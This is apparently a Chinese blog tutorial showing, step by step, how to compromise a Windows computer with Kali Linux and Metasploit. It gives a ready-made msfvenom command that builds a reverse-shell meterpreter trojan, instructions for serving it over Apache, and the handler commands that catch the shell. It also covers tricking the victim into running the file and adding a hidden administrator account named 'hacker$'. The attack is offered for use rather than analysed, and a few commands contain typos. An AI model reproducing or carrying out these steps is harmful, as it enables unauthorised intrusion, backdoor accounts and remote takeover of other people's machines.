一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。
  其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。

二、步骤:

  Step1:生成木马,msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=Kali的IP lport=5555 -f exe >/root/Desktop/evilshell.exe

      -p 参数后跟上payload,攻击成功后要做什么事情
      lhost 后跟监听的IP
      lpost 后跟监听端口
      -f 后跟要生成后门文件的类型
      >重定向

    

  Step2:将生成的木马文件evilshell.exe 拷贝到/var/www/html,开启apache服务,在肉鸡上打开浏览器,访问该站点(Kali的IP),下载木马文件。

cp evilshell.exe /var/www/html/
service apache2 start

  

  Step3:开启MSF,提前查看postgresql运行状态 msfconsole

ps -aux |grep postgresql

  

msfconsole

  

      exploits:开发利用,用来攻击某些服务、平台、系统等用到的工具
      payload:载荷载体,攻击成功后要操作什么

    输入以下命令

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp(选择木马时选的payload)
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost kali的IP
msf5 exploit(multi/handler) > set lpost 5555
msf5 exploit(multi/handler) > run(或者exploit)

  

   

  Step4:在肉鸡中诱导用户点击exe程序(社会工程学攻击),在Kali中就会得到肉鸡的shell(meterpreter)

msf5 exploit(multi/handler) > run

  

   Step5:现在就可以给肉鸡添加用户了

net user
net user hacker$ /add
net user hacker$ 123.com
net localgroup administrators hacker$ /add 添加到管理员组
net user hacker$

  

   Step6:远程登录肉鸡计算机

rdesktop + windows的IP

  

   

   

 至此,使用Kali控制Windows成功!

02-11 10:17